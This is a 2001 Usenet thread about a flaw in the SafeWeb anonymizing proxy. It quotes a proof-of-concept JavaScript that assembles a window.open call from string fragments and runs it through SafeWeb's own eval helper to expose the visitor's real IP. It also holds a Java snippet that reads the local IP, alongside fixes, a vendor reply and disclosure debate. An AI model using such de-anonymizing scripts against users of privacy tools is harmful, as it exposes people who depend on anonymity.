May 3, 2001, 8:50:44 PM5/3/01
to
Capit...@Freedom.org (Free-man) writes:
> According to Safeweb's FAQ, it is not necessary to enable
> Java or JavaScript.

Javascript yes, Java no.

Free-man

unread,
May 4, 2001, 6:06:21 PM5/4/01
to
On 03 May 2001 17:50:44 -0700, Paul Rubin <phr-...@nightsong.com>
wrote:

Hello Paul -- You seem to know what you are talking about but
I will include the relevant parts of the FAQ anyway. And it still
doesn't work for me. :(

Rich Eramian aka freeman at shore dot net

"... We also strongly recommend turning on Javascript and
cookies in your Web browser preferences as those will
substantially improve your SafeWeb browsing experience."

" How does SafeWeb handle JavaScript?
There have been numerous claims, mainly by privacy
companies, that JavaScript by itself is very dangerous to
your privacy and that pages containing JavaScript should
not be allowed through their privacy servers. These claims
are false. JavaScript is no more "dangerous" than HTML. By
design, JavaScript was limited in its feature set to prevent
any abuse of your computer or privacy. It is harder to make
JavaScript code secure than it is to secure HTML but
certainly not impossible. We analyze all JavaScript code
that passes through our servers and sanitize it so that you
can maintain your normal browsing habits while still
remaining safe from prying eyes. We do the same for
VBScript."

Dave Howe

unread,
May 4, 2001, 6:57:46 PM5/4/01
to
In our last episode (<alt.security.pgp>[Wed, 2 May 2001 16:33:56
-0700]), "A. Melon" <ju...@melontraffickers.com> said :

>On Wed, 02 May 2001 22:11, Dave Howe <Spam.B...@bigfoot.com>
>wrote..
>>Governments have happily let thousands of people die before now
>>to hide the fact they can eavesdrop on sensitive conversations..
>The CIA contracted Safeweb. Safeweb should be considered monitored.
Gas stations sell Gas to the CIA for their cars. Gas stations should
be considered monitored.

>Safeweb is not secure.. I tested Safeweb with an embedded object and
>'the worm bot' clearly showed my original IP#, together with the IP#
>of the Safeweb relay.

presumably this is the imbedded object that was the subject of the
"shall I allow this y/n?" dialog box you said Y to?

Anonymous

unread,
May 5, 2001, 3:25:19 PM5/5/01
to

On Fri, 04 May 2001 23:57, Dave Howe <Spam.B...@bigfoot.com>
wrote..

>"A. Melon" <ju...@melontraffickers.com> said :
>>Dave Howe <Spam.B...@bigfoot.com> wrote..

>>>Governments have happily let thousands of people die before now
>>>to hide the fact they can eavesdrop on sensitive conversations..
>>The CIA contracted Safeweb. Safeweb should be considered monitored.

>Gas stations sell Gas to the CIA for their cars. Gas stations should
>be considered monitored.

Very true, camera's et al.
Dave.. I am capable of reasoning, are you?..

>>Safeweb is not secure.. I tested Safeweb with an embedded object
>>and 'the worm bot' clearly showed my original IP#, together with
>>the IP# of the Safeweb relay.

>presumably this is the imbedded object that was the subject of the
>"shall I allow this y/n?" dialog box you said Y to?

No.. I read that JavaScript *must* be allowed, so I tested Safeweb
against known exploits. Safeweb != Safe..

DrJohn.


Dave Howe

unread,
May 5, 2001, 4:15:52 PM5/5/01
to
In our last episode (<alt.security.pgp>[Sat, 5 May 2001 21:25:19
+0200 (CEST)]), Anonymous <m...@mix2.hyperreal.pl> said :

>On Fri, 04 May 2001 23:57, Dave Howe <Spam.B...@bigfoot.com>
>wrote..
>Very true, camera's et al.
>Dave.. I am capable of reasoning, are you?..
Probably ;)

>No.. I read that JavaScript *must* be allowed, so I tested Safeweb
>against known exploits. Safeweb != Safe..

Well, that is easy for you to demonstrate - return to that site, load
up the page, and save it as a Safeweb shortcut - then paste the url
here so we can see it fail for ourselves.

Paul Rubin

unread,
May 5, 2001, 8:27:09 PM5/5/01
to
Capit...@Freedom.org (Free-man) writes:
> >Javascript yes, Java no.
>
> Hello Paul -- You seem to know what you are talking about but
> I will include the relevant parts of the FAQ anyway. And it still
> doesn't work for me. :(

What exactly did you do and what browser are you using?

> " How does SafeWeb handle JavaScript? ... We
> analyze all JavaScript code that passes through our servers and
> sanitize it so that you can maintain your normal browsing habits
> while still remaining safe from prying eyes.

I don't believe it's possible for Safeweb to completely sanitize
javascript and also ensure that all pages view normally (think of the
"eval" function). Safeweb does a reasonable job on the usual
javascript constructions though. And it offers a setting to
completely disable incoming javascript, which is what I'd recommend if
you think the remote page might contain javascript designed to
circumvent safeweb.

Mr. Anonymous

unread,
May 5, 2001, 11:34:24 PM5/5/01
to

On Sat, 05 May 2001 21:15, Dave Howe <Spam.B...@bigfoot.com>
wrote..

>Anonymous <m...@mix2.hyperreal.pl> said :
>>Dave Howe <Spam.B...@bigfoot.com> wrote..

>>Very true, camera's et al.
>>Dave.. I am capable of reasoning, are you?..
>Probably ;)

<g>Let's find out..

>>No.. I read that JavaScript *must* be allowed, so I tested Safeweb
>>against known exploits. Safeweb != Safe..

>Well, that is easy for you to demonstrate - return to that site,
>load up the page, and save it as a Safeweb shortcut - then paste the
>url
>here so we can see it fail for ourselves.

Nope. That would compromise my anonymity.
Suggest something else.

DrJohn.

--
This message was posted via one or more anonymous remailing services.
The original sender is unknown. Any address shown in the From header
is unverified.

Paul Rubin

unread,
May 6, 2001, 3:09:28 AM5/6/01
to
Dave Howe <Spam.B...@bigfoot.com> writes:
> Well, that is easy for you to demonstrate - return to that site, load
> up the page, and save it as a Safeweb shortcut - then paste the url
> here so we can see it fail for ourselves.

Try visiting http://www.nightsong.com/phr/safeweb-insecure.html. That
page contains some javascript to pop a window on www.yahoo.com, where
the javascript is cooked to bypass Safeweb's anonymization, so your IP
address will appear in Yahoo's logs.

Of course I could have made the javascript generate an image tag
to a 1x1 pixel invisible gif on my site, instead of to Yahoo.
That means I'd have gotten your IP instead of Yahoo, and no window
would have popped.

Safeweb does anonymize normal, straightforwardly written Javascript,
but someone writing javascript specifically to beat Safeweb
anonymization can get your address. I haven't noticed any sites doing
that, and I find Safeweb useful for providing low-grade privacy
despite its having some security holes. I would never think of it as
being in the same league as ZKS Freedom or anything like that.

Thomas Shaddack

unread,
May 6, 2001, 9:44:39 AM5/6/01
to
Paul Rubin <phr-...@nightsong.com> wrote in
<7xn18rt...@ruckus.brouhaha.com>:

>Of course I could have made the javascript generate an image tag
>to a 1x1 pixel invisible gif on my site, instead of to Yahoo.
>That means I'd have gotten your IP instead of Yahoo, and no window
>would have popped.

Combine it with access-blocking proxy, configure the proxy with a
"whitelist" (forbid access to machines other than the listed ones), and put
Safeweb's site on the whitelist? This would catch all the HTTP requests to
other servers that could jeopardize your security.

Of course, non-HTTP connections aren't affected and still pose risk. Couple
this with a sort of a firewall (ZoneAlarm? Tiny Personal Firewall?) that
will guard other outgoing connections.

Could help.

Shaddack, the Mad Scientist

Dave Howe

unread,
May 6, 2001, 5:31:01 PM5/6/01
to
In our last episode (<alt.security.pgp>[06 May 2001 00:09:28 -0700]),
Paul Rubin <phr-...@nightsong.com> said :

>Try visiting http://www.nightsong.com/phr/safeweb-insecure.html. That
>page contains some javascript to pop a window on www.yahoo.com, where
>the javascript is cooked to bypass Safeweb's anonymization, so your IP
>address will appear in Yahoo's logs.
You have my public apology - you have successfully bypassed Safeweb's
javascript filter.
for those who don't want to visit the above page, here is the code
concerned:

<script>
foo = "win";
foo = foo +( "dow.o");
foo = foo +( "pen ('ht");
foo = foo +( "tp:/");
foo = foo +( "/ww");
foo = foo +( "w.yahoo.com')");
eval(
window.top.fugunet_getCleanJS(
foo, "https://www.safeweb.com/o/_o(154):_win(1):_w:
_base(http://www.nightsong.com/phr/):"));
</script>
<script language='vbscript'
src='https://www.safeweb.com/_s:fugunet_vbslib.htm'></script>

as you can see, it builds the script command
"window.open('http://www.yahoo.com')" from string segments, then uses
one of Safeweb's *own scripts* to execute it ;)

Dave Howe

unread,
May 6, 2001, 5:32:46 PM5/6/01
to
In our last episode (<alt.security.pgp>[Sun, 6 May 2001 13:44:39 +0000
(UTC)]), NOSPAMs...@type2.com (Thomas Shaddack) said :

>Combine it with access-blocking proxy, configure the proxy with a
>"whitelist" (forbid access to machines other than the listed ones), and put
>Safeweb's site on the whitelist? This would catch all the HTTP requests to
>other servers that could jeopardize your security.
it would catch this one 'sploit, yes - but if you had some javascript
that changed a hidden field on your form to read as your IP address,
then legitimately hit the "send" button thinking you were just logging
into your webmail, but were in fact confirming your real email address
to them via the safeweb interface?

Paul Rubin

unread,
May 6, 2001, 8:00:06 PM5/6/01
to
NOSPAMs...@type2.com (Thomas Shaddack) writes:
> >Of course I could have made the javascript generate an image tag
> >to a 1x1 pixel invisible gif on my site, instead of to Yahoo.
> >That means I'd have gotten your IP instead of Yahoo, and no window
> >would have popped.
>
> Combine it with access-blocking proxy, configure the proxy with a
> "whitelist" (forbid access to machines other than the listed ones), and put
> Safeweb's site on the whitelist? This would catch all the HTTP requests to
> other servers that could jeopardize your security.

Yeah, you could do that, it would fix the security hole, but it means
that the page wouldn't operate properly (you wouldn't see the pop-up
window). The whole approach of anonymizing by rewriting html/js is a
big kludge. The real fix is to set up the anonymizer as a
conventional proxy server that does no html rewriting, and configure
your browser to pull everything through it. That's how lwpa.com worked
but I think it's shut down now.

Thomas Shaddack

unread,
May 7, 2001, 2:03:24 PM5/7/01
to
Dave Howe <Spam.B...@bigfoot.com> wrote in
<0lgbftkgsm798fkv8...@4ax.com>:

>it would catch this one 'sploit, yes - but if you had some javascript
>that changed a hidden field on your form to read as your IP address,
>then legitimately hit the "send" button thinking you were just logging
>into your webmail, but were in fact confirming your real email address
>to them via the safeweb interface?

(Real email address, or an IP address? Say it's a typo. :) )

Yeah, *this* would be what would go through all the javascript-conserving
protections. The script is:

addr=java.net.InetAddress.getLocalHost();
host=addr.getHostName();
ip=addr.getHostAddress();

However, defense still exists; java object is a toplevel object for
accessing all the classes in the java package from within javascript.
I found this one class in the file /windows/java/packages/d7t757lf.zip
(about 5 megs), as java/net/InetAddress.class file.

One of the possibilities is to just erase the class files (if java virtual
machine is never to be used on the computer). If you want to retain java
capabilities but don't want it to access your IP, just erase or damage this
file in the package.

Other possibility, useful for selectively disabling javascript
functions/objects, is to find the relevant DLL in /windows/system/, take a
hexeditor, and subtly change the name of the property there (ie, insert a
different character; I usually use "!" to replace some character in the
identifier). This is pretty universal method to deal with language
interpreters.

CAVEAT: It can happen that your labour will be destroyed by a random update
of the system without you knowing about it. Keep a checksum of the file and
check it during each startup. Alternatively, have a copy of the file
somewhere and copy it back to its original location during each startup.
(The run-when-startup directory and relevant registry entries are your
friends.)

The direct binary editing of the DLLs is deadly effective measure to deal
with things like spyware. Usually the URLs the program has to contact (most
of spyware uses HTTP as transport protocol, it's very comfortable and
bulletproof in terms of compatibility with the installations) is stored
somewhere in the file. Find it, destroy it. Either repoint it to 127.0.0.1
or to a friendly machine where you have alternate content to receive. Or
replace it with a nonexistent address; the DNS lookup then will fail and no
request will be done.

Some adware/spyware uses a default proxy, as set in the browser. This is
what I call nice behaviour, and a filtering proxy (like my pet, Internet
Junkbuster) can deal with it. However, in some cases (like the infamous
Aureate advert.dll), the library contains its own socket code and does the
requests on its own; in such cases, you will usually find in the DLL the
HTTP headers and a GET or POST statements. Destroy them. Computers treat
such things on the principle of exact matches, so one-character difference
makes the line incomprehensible for the target machine, even if the request
will not be possible to be intercepted it will not be understood. (So no
more dancing animated GIFs!) Proven experimentally, works.

This is universally usable approach when you want to disable some functions
of the software. It is very powerful way to enforce your will. Of course,
in some jurisdictions it could be considered illegal, as it is "unlicenced
modification".

Be creative.
It's only ones and zeroes! :)

Shaddack, the Mad Scientist

Dave Howe

unread,
May 7, 2001, 3:51:28 PM5/7/01
to
In our last episode (<alt.security.pgp>[Mon, 7 May 2001 18:03:24 +0000
(UTC)]), NOSPAMs...@type2.com (Thomas Shaddack) said :
>Dave Howe <Spam.B...@bigfoot.com> wrote in
><0lgbftkgsm798fkv8...@4ax.com>:
>
>>it would catch this one 'sploit, yes - but if you had some javascript
>>that changed a hidden field on your form to read as your IP address,
>>then legitimately hit the "send" button thinking you were just logging
>>into your webmail, but were in fact confirming your real email address
>>to them via the safeweb interface?
>(Real email address, or an IP address? Say it's a typo. :) )
both, actually - if you include the email address you type in for use
with anon logins/actual mail (if you are foolish enough to use
Netscape for both email and browsing) but yes, it was a braino - I
meant IP (as you could deduce from the statement about changing a
formfield to unhide it) but was thinking "and maybe email as well" and
sorta missed out some words ;)

>Yeah, *this* would be what would go through all the javascript-conserving
>protections. The script is:

>One of the possibilities is to just erase the class files (if java virtual
>machine is never to be used on the computer). If you want to retain java
>capabilities but don't want it to access your IP, just erase or damage this
>file in the package.

Obvious replies here are that (as you noted) a random update could
replace them (and indeed, future versions of the browser may well
check the checksum for that file internally and fix it every time) and
second, that you may not be able to do so - if (for example) it is a
company or cybercafe computer, then a dim view will be taken of you
buggering about at a low level with system files.
In any case, it is a fairly techie thing to do - I could do it, as
could most of this group - but if your auntie has a computer (you
know, the one who calls you for tech support and can't launch the
internet dialup if the "The Internet" icon gets accidentally dragged
into a folder), could you trust her to do it successfully? Should you
have to? the bulk of this attack relies on two things
a) building the command as a string at runtime
b) calling Safeweb internal routines to execute the string
all that is really needed is for the Safeweb internal routine to
sanity-check the input one more time - if it gets handed an unsafe
string that it wouldn't have passed the first time through - then it
shouldn't pass it the second time. yes, this will add overheads - but
with luck they will be low.

Jon Chun

unread,
May 7, 2001, 7:23:40 PM5/7/01
to
FYI,

The JavaScript code on the site referenced below is indeed "cooked"
and in a form neither the author nor we have ever seen real content
sites use. In fact, a company/webmaster would usually have to go to
some length to re-write all their links in such an unnatural and
difficult to maintain fashion in a futile attempt to fool SafeWeb.
To protect yourself against such potentially malicious websites simply
click on the "Configure" button in the SafeWeb toolbar and check the
"Paranoid" sanitization level.

To verify SafeWeb defeats this "cooked" JavaScript please try the
following:

1) Go to www.safeweb.com
2) Enter www.yahoo.com in the main input box and click the "Go!"
button
3) The secure SafeWeb browser window will open up with our toolbar at
the top. Click on the "Configure" button below the URL input box.
4) The Configuration window will pop-up, check the "Paranoid" box
under the Sanitization level and then click "Update Options"
5) Now enter "www.nightsong.com/phr/safeweb-insecure.html" into the
SafeWeb toolbar

You'll now see that this "cooked" malicious JavaScript code is blocked
by SafeWeb and you are protected from any invasive pop-up yahoo window
(or 1x1 gif). The "Paranoid" Sanitization Level is not a default
because such malicious websites are extremely rare while many more
real websites may use the same potentially dangerous JavaScript
command for legitimate reasons. Rather than potentially limit
functionality of these real websites we've enabled you to selectively
protect yourself against such theoretically malicious websites should
they come into existence.

Keep in mind, any website that did intentionally deploy such malicious
"cooked" JavaScript would immediately stand-out and garner negative
press for going to such extreme efforts for controversial
anti-consumer and anti-privacy objectives. In a time when even
companies like DoubleClick are backtracking on their previous privacy
violations and appointing "Chief Privacy Officers", consumer rights
groups are winning the ear of the media and even the government is
hard at work on privacy legislation you're not likely to see any
significant web property go through such contortions and costs to
invade your privacy with such "cooked" JavaScript. If this did come
to pass, you can just block such malicious JavaScript now via our
"Paranoid" Sanitization Level or SafeWeb could automatically switch on
"Paranoid" sanitization for known offenders. In addition, SafeWeb can
simply add code to trap such "cooked" code if the situation demands it
as described below.

(NOTE: The next two paragraphs have a more technical description for
those who are interested in the details of how this "cooked"
JavaScript works and how SafeWeb defeats it. Please ignore it if
you're neither technical nor interested in such detail).

This "cooked" JavaScript works by taking advantage of what SafeWeb
calls "dangerous" JavaScript such as those commands with the ability
to create self-modifying code including the "eval" statement used
here. Such self-modifying code works by dynamically creating
additional commands that are then executed. The danger here is that
any sanitization program parsing self-modifying code will not, to a
first approximation, know what the ultimate command created by
self-modifying code is before execution making it difficult to
determine malicious intent. In addition, the eval command is executed
on the remote client PC within the web browser's embedded JavaScript
interpreter engine which SafeWeb has no view into. To catch
maliciously written self-modifying code one would have to basically
create a full JavaScript interpreter on our proxy servers and test the
execution there.

However, because JavaScript, VBScript and most other web scripting
languages are relatively straightforward and have few powerful,
potentially malicious commands we can contain the potential problems
much more simply. The simplest solution is to selectively block these
few commands which could potentially be misused which is what
"Paranoid" Sanitization does in SafeWeb. Most websites do not depend
upon these few JavaScript commands so most web surfing is unaffected.
Should websites begin to commonly deploy such malicious JavaScript
(very unlikely), SafeWeb can further address this issue by extending
our JavaScript sanitizer to only pass through self-modifying commands
we can resolve and certify to be secure. This would leave the vast
majority of the rich websites secure and functional via SafeWeb.

(NOTE: End of Technical jargon)

The overriding design goals of SafeWeb are to be "easy to use" and
"effective". SafeWeb was founded because there was (and still is) no
other security technology meeting both of these goals. There are very
effective solutions like "PGP", "SSH", "Citrix Metaframe" and
"Freedom" to solve various security and privacy issues but all are too
complex and expensive for the vast majority of users who are
non-technical which explains why none of them can be considered a
standard for Internet privacy. We decided early on that this market
for complex security applications was crowded with good products. In
addition, most download applications such as Alexa, Freedom, Brodia,
etc (although useful) have been marketplace failures, massively
unprofitable, of questionable longevity, and do not meet the general
needs of 95% of Internet users who even struggle with AOL. In
addition, download applications have tremendous problems with cross
platform programming, support and costs as well as incompatibilities
with other applications, operating systems and even ISPs like AOL.
Finally, download applications do not work on managed networks like
corporate LANs or behind restrictive government firewalls where
privacy and security are most in need. However, if a particular user
does have the money, time, expertise and no technical
incompatibilities/restrictions that allow these applications to be
used they are effective no doubt.

To be easy to use SafeWeb had to be a web-based security solution
anyone could use anywhere, anytime without downloads, configuration,
registration, login, etc. In looking at the many web-based privacy
proxies we realized that none were really effective. Before SafeWeb
became the world's largest privacy proxy shortly after our launch, the
oldest and previously largest web-based security solution did then and
still: (1) sends all web content unencrypted over the public Internet
(paid and free version - SSH tunneling very costly, complicated,
impractical and not a pure web solution), (2) can only sanitize simple
static HTML breaking millions of rich websites like sony, mtv,
hotmail, etrade and webvan (all versions), (3) partners with invasive
advertisers like flycast, (4) can easily be blocked by firewalls and
censorware (all versions) and (5) blocks you from viewing many websites
(free version).

SafeWeb has solved all these shortcomings common among the "easy to
use" web-based privacy solutions in order to create an "effective"
security solution. In addition, with TriangleBoy SafeWeb is the only
privacy service of any kind that cannot be blocked via traditional
firewalls and other censorware. Within a few months from launch
SafeWeb has quickly grown to be the world's largest online browsing
privacy service mostly via a few good press articles, word of mouth
and users voting with their browsers.

Although no security technology is immune from such issues, we have
not discovered nor had any actual security holes reported to us. To
date, all such reports of potential security holes have turned out to
be from users who do not know of all functionality of SafeWeb which
we often embed behind the "Configure" button to protect non-technical
users from overload. We are not overly arrogant or naive to think
that such security holes will not eventually be discovered and always
listen and respond quickly to all such feedback like this one. If
you do find what you think is a security hole or have other issues or
comments regarding SafeWeb/TriangleBoy please contact us at
feed...@safeweb.com.

Regards,

Jon Chun
President & Co-founder
SafeWeb

On 06 May 2001 00:09:28 -0700, Paul Rubin <phr-...@nightsong.com>
wrote:

>Dave Howe <Spam.B...@bigfoot.com> writes:
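
The runtime re-check Dave Howe proposes and the self-modifying-code problem Jon Chun describes, as an added example (not SafeWeb's code and not from any poster): a toy rewriting sanitizer misses a URL assembled from string fragments when it scans the page text, and catches it when the same rule is applied again to the string handed over for execution. `PROXY_PREFIX` and all function names are hypothetical, and the posted script's `eval(...)` call is replaced by `return hook(...)` so nothing is executed.

```javascript
// Added illustration; PROXY_PREFIX and every function name are hypothetical.
const PROXY_PREFIX = "https://proxy.example/o/";

// A quoted absolute http(s) URL, as a rewriting proxy would look for it.
const QUOTED_URL = /(["'])(https?:\/\/[^"']+)\1/g;

// Rewrite every quoted absolute URL so the request goes via the proxy.
function rewriteUrls(code) {
  return code.replace(QUOTED_URL, (match, quote, url) =>
    url.startsWith(PROXY_PREFIX)
      ? match
      : quote + PROXY_PREFIX + encodeURIComponent(url) + quote);
}

// Absolute URLs that still point somewhere other than the proxy.
function directUrls(code) {
  const found = code.match(/https?:\/\/[^\s"'`)]+/g) || [];
  return found.filter((url) => !url.startsWith(PROXY_PREFIX));
}

// Pass 1: the proxy sees only the page text while it is in transit.
function staticSanitize(pageScript) {
  return rewriteUrls(pageScript);
}

// Pass 2, variant A: a runtime helper that trusts the string it is given.
function trustingHook(code) {
  return { run: true, code };
}

// Pass 2, variant B: apply the same rule again to the final string and
// refuse to run anything that still contains a direct URL (fail closed).
function recheckingHook(code) {
  const rewritten = rewriteUrls(code);
  const leaks = directUrls(rewritten);
  return leaks.length === 0
    ? { run: true, code: rewritten }
    : { run: false, code: "", blocked: leaks };
}

// The fragments from the post; the final call returns the hook's verdict
// instead of evaluating the assembled string.
const COOKED_PAGE_SCRIPT = `
var foo = "win";
foo = foo + "dow.o";
foo = foo + "pen ('ht";
foo = foo + "tp:/";
foo = foo + "/ww";
foo = foo + "w.yahoo.com')";
return hook(foo);
`;

// Stand-in for the browser: only here do the fragments become one string.
function executeInBrowser(pageScript, hook) {
  return new Function("hook", pageScript)(hook);
}

function demo() {
  const inTransit = staticSanitize(COOKED_PAGE_SCRIPT);
  return {
    staticPassChangedAnything: inTransit !== COOKED_PAGE_SCRIPT,
    trusting: executeInBrowser(inTransit, trustingHook),
    rechecked: executeInBrowser(inTransit, recheckingHook),
    // Constructed input the rewrite rule cannot handle (backtick quoting).
    failClosed: recheckingHook("new Image().src = `http://tracker.example/p.gif`;"),
  };
}

console.log(JSON.stringify(demo(), null, 2));
```

The hook only helps if every path that turns a string into code goes through it; a string that builds a further string needs the same check at each layer.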

Free-man

unread,
May 7, 2001, 8:06:27 PM5/7/01
to
On 05 May 2001 17:27:09 -0700, Paul Rubin <phr-...@nightsong.com>
wrote:

>Capit...@Freedom.org (Free-man) writes:


>> >Javascript yes, Java no.
>>
>> Hello Paul -- You seem to know what you are talking about but
>> I will include the relevant parts of the FAQ anyway. And it still
>> doesn't work for me. :(
>
>What exactly did you do and what browser are you using?

My browser is Opera with scripting languages enabled.
I go to the Safeweb site and type in a URL such as
http://www.fff.org or www.fff.org and get a popup box
saying "illegal address"

On the page where I type the URL , there is a message, "We can not
guarantee that your version of Netscape is supported by Safeweb.
We recommend that you use Netscape versions later than 4.02 excluding
6.x releases."

So maybe Safeweb does not like Opera.

Dave Howe

unread,
May 7, 2001, 9:20:36 PM5/7/01
to
In our last episode (<alt.security.pgp>[Mon, 07 May 2001 23:23:40
GMT]), safe...@pacbell.net (Jon Chun) said :
Interesting - welcome to the group(s) Jon - I hope you hang around a
while so we can ask you things about safeweb ;)

>FYI,
>The JavaScript code on the site referenced below is indeed "cooked"
>and in a form neither the author nor we have ever seen real content
>sites use. In fact, a company/webmaster would usually have to go to
>some length to re-write all their links in such an unnatural and
>difficult to maintain fashion in a futile attempt to fool SafeWeb.

I hate to point out that the webmaster might not even know - it could
be a webbanner include, from a doubleclick-style site.

>To protect yourself against such potentially malicious websites simply
>click on the "Configure" button in the SafeWeb toolbar and check the
>"Paranoid" sanitization level.

which seems to work, yes - but unfortunately at the expense of some of
the other javascript-using sites I tried. I assume that is why it
isn't the default.

>You'll now see that this "cooked" malicious JavaScript code is blocked
>by SafeWeb and you are protected from any invasive pop-up yahoo window
>(or 1x1 gif). The "Paranoid" Sanitization Level is not a default
>because such malicious websites are extremely rare while many more
>real websites may use the same potentially dangerous JavaScript
>command for legitimate reasons. Rather than potentially limit
>functionality of these real websites we've enabled you to selectively
>protect yourself against such theoretically malicious websites should
>they come into existence.

the problem then becomes identifying such sites.
Let us take a scenario using only the displayed functionality - a
DoubleClick style advertising company decides it desperately needs
marketing info on those who are safewebbing; to this end, it arranges
for the free web hosts to be requesting an entire html page from their
server (or SSI requesting a subset of html), rather than just a
graphic. on selected days then, it checks the inbound request, and for
sites that are in the Safeweb IP range, returns a cooked page that
opens one of the usual annoying popups, frameless and without any
controls other than the close. so many geocities-style sites use them,
users just close them automatically without even really looking at
them - but in this case, they have stepped outside of the nice safe
Safeweb sandbox. Provided the terms & conditions of the hosting
service permit it (a generic "hosting services xxx is funded entirely
by advertising revenue; while we do not track visitor IP addresses in
any way, we cannot guarantee that our advertisers do not;" followed by
and buried in enough of the usual "withdraw a site at any time" and
"illegal content not permitted" clauses that few people ever read will
give the host something to point at and wash their hands of the
situation) they will say they are exchanging webspace and bandwidth
for advertising "eyeballs" in an increasingly poor-paying market, and
are surprised/upset about this and will take it up with the company
immediately....

>Keep in mind, any website that did intentionally deploy such malicious
>"cooked" JavaScript would immediately stand-out and garner negative
>press for going to such extreme efforts for controversial
>anti-consumer and anti-privacy objectives.

no more than they would for gathering such info anyhow - if they feel
no guilt over grabbing and correlating such info in the first place,
then they are unlikely to feel added guilt over bypassing any
lockdowns the user may have put in place.

>In a time when even
>companies like DoubleClick are backtracking on their previous privacy
>violations and appointing "Chief Privacy Officers", consumer rights
>groups are winning the ear of the media and even the government is
>hard at work on privacy legislation you're not likely to see any
>significant web property go through such contortions and costs to
>invade your privacy with such "cooked" JavaScript. If this did come
>to pass, you can just block such malicious JavaScript now via our
>"Paranoid" Sanitization Level or SafeWeb could automatically switch on
>"Paranoid" sanitization for known offenders.

It would almost have to be automatic - members of these groups are the
converted as far as privacy goes, but the average joe-on-the-street
will just assume Safeweb is transparently doing what it says it is -
sanitizing attempts to track him.

>In addition, SafeWeb can
>simply add code to trap such "cooked" code if the situation demands it
>as described below.

<snip>
I must admit to not having learned JS to this depth - is it really so
difficult to rewrite Eval(string) as Eval(Safeweb.checksafe(string))?
(note this is not valid syntax, and I know it - it is just to give feel
for the required process) or would that be too slow for most uses? I
have the feeling it would be (imagining a site calculating a clock
with eval *shudder*)
how about a java library? could you call a local java app to
sanity-check strings for you? even if this only caught events after
the fact (got a copy of the string after it had been passed to eval,
and popped up an "oops, site has done $NAUGHTYTHING; click here if
you wish to inform Safeweb of the following information:
website url
string"

>The overriding design goals of SafeWeb are to be "easy to use" and
>"effective". SafeWeb was founded because there was (and still is) no
>other security technology meeting both of these goals. There are very
>effective solutions like "PGP", "SSH",

both of which are really only packet-based - ok for email or terminal
sessions, but not really much use to the average user.
I could see a use for a VPN tunnel to a web proxy that doesn't pass on
user IP, but as you point out, this requires a lot of client-side code
to be running.

>"Citrix Metaframe"
not really a security tool - but useful for remote dialin to a LAN.

>and "Freedom"
heard good things about it - but yes, requires client-side installs
and accounts and so forth.

> In
>addition, download applications have tremendous problems with cross
>platform programming, support and costs as well as incompatibilities
>with other applications, operating systems and even ISPs like AOL.

Hmm. Safeweb works well in IE and Netscape........

<snip advertising copy>
yes, Safeweb is vastly better than Anonymiser, and for free we are
probably looking a gift horse in the mouth - but unfortunately, by
establishing an expectation of "for dummies" online security, you may
be risking getting users to drop protection they might otherwise have
used
(taking an extreme example; someone living in a repressive country
might be posting info on people the local troops are looking for to an
online site so they know to dig a hole and pull it in after them until
they stop looking; the local governor decides finding out who this is
is a high priority (especially now he seems to be posting directly to
the board, rather than sending the data to an online confederate in
america who then posted it up to a day later) so they hire a hacker
who breaks into the site - finding safeweb accesses he can't trace.
but hey, here is this handy 'sploit he knows - so he arranges for the
upload page (only) to trace the IP of whoever uploads the next file to
that area.....)
Yes, it's an extreme example, and the user should not have been so
foolish as to rely on Safeweb alone if his life depended on it (or to
at least investigate the settings and set them to "paranoia" every
time) - but he could well believe that the extra day of advanced
warning would save more lives than he was risking.

>Although no security technology is immune from such issues, we have
>not discovered nor had any actual security holes ....<snip>
we have. Ok, we have not found a *live* site using this, but a hole is
a hole - the usual theme for Bugtraq posts is that it is better to fix
the hole in advance than risk a blackhat exploiting the hole for
months before anyone notices. In the same theme, it would have been
better for Safeweb to have been notified directly rather than told
this conversation was happening - Bugtraq posts are usually condemned
by the list members if they don't say the authors were notified, and
given at least a week to respond (note not fix - just acknowledge the
problem and give an estimate of the time it will take to fix) but the
fact still remains - if a route exists to bypass the protection of a
program, then you do not need to find examples of it "in the wild"
before you look into patching it. I would argue that "safe unless the
webmaster wants to make a real effort to get your data" is not safe
enough.
I am sorry if this is a bit unformatted - but it is after 2am here,
and I am going to bed now ;)

Free-man

May 8, 2001, 8:58:20 AM
On Mon, 07 May 2001 23:23:40 GMT, safe...@pacbell.net (Jon Chun)
wrote:

>SafeWeb has solved all these shortcomings common among the "easy to
>use" web-based privacy solutions in order to create an "effective"
>security solution. In addition, with TriangleBoy SafeWeb is the only
>privacy service of any kind that cannot be blocked via traditional
>firewalls and other censorware. Within a few months from launch
>SafeWeb has quickly grown to be the world's largest online browsing
>privacy service mostly via a few good press articles, word of mouth
>and users voting with their browsers.
>
>Although no security technology is immune from such issues, we have
>not discovered nor had any actual security holes reported to us. To
>date, all such reports of potential security holes have turned out to
>be from users who do not know of all functionality of SafeWeb which
>we often embed behind the "Configure" button to protect non-technical
>users from overload. We are not overly arrogant or naive to think
>that such security holes will not eventually be discovered and always
>listen and respond quickly to all such feedback like this one. If
>you do find what you think is a security hole or have other issues or
>comments regarding SafeWeb/TriangleBoy please contact us at
>feed...@safeweb.com.

Hello Jon

FYI, Safeweb does not work with Opera, the best browser on the market.

Thomas Shaddack

May 8, 2001, 6:52:57 PM
Dave Howe <Spam.B...@bigfoot.com> wrote in
<b4feft88h4ochujrv...@4ax.com>:

<snip>
>I must admit to not having learned JS to this depth - is it really so
>difficult to rewrite Eval(string) as Eval(Safeweb.checksafe(string))?
>(note this is not valid syntax, and I know it - it is just to give feel
>for the required process) or would that be too slow for most uses? I
>have the feeling it would be (imagining a site calculating a clock
>with eval *shudder*)
>how about a java library? could you call a local java app to
>sanity-check strings for you? even if this only caught events after
>the fact (got a copy of the string after it had been passed to eval,
>and popped up an "oops, site has done $NAUGHTYTHING; click here if
>you wish to inform Safeweb of the following information:
>website url
>string"

Not necessary, not necessary!

It's possible to re-set eval() function pointer to another function that
gets executed instead each time eval() is called.

Example:
<script language=javascript>
eval=alert;
eval("document.write('This is a test');");
</script>

Try this and you will see what I mean. I just tried it (MSIE5) and it
works. :)

Disclaimer: I am not familiar with SafeWeb's javascript libraries so I
don't know what functions are available and what further "magic" is
possible.

The implementation could look this way:

function safeeval(s)
{return randomstringeval(Safeweb.checksafe(s));} //Check the string, then run the real eval
randomstringeval=eval; //Prevent recursion
eval=safeeval;

The "randomstring" part would have to be replaced by a random sequence of
characters, unique for each page served; this will prevent eventual attack
via direct call of original renamed unsecured eval().

This script has to be placed at the very beginning of the page; I suppose
this part is trivial for SafeWeb's processing scripts.

Voila, eval() hole is closed :)

